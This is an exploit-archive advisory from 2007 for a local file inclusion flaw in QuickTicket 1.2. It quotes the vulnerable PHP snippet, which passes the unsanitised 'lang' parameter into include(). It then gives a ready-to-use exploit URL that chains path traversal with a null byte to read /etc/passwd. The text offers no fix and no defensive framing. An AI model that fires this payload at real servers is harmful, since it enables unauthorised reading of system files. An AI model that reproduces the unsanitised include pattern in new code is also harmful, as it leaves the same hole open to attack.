[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : QuickTicket 1.2 (qti_checkname.php) Local File Inclusion Vulnerability
# Published : 2007-06-27
# Author : Katatafish
# Previous Title : QuickTalk forum 1.3 (lang) Local File Inclusion Vulnerabilities
# Next Title : phpSiteBackup 0.1 (pcltar.lib.php) Remote File Inclusion Vulnerability
###QuickTicket v1.2 Local File Inclusion###
#download: http://www.qt-cute.org/download/qti12.zip
#found by: katatafish (karatatata@hush.com)
#vulncode:
$strLang = $_GET["lang"];
include("language/$strLang/qtf_lang_reg.inc");
#exploit:
http://www.site.com/[path]/qti_checkname.php?lang=./../../../../../../../../../../etc/passwd%00
#thanks:str0ke
# www.Syue.com [2007-06-27]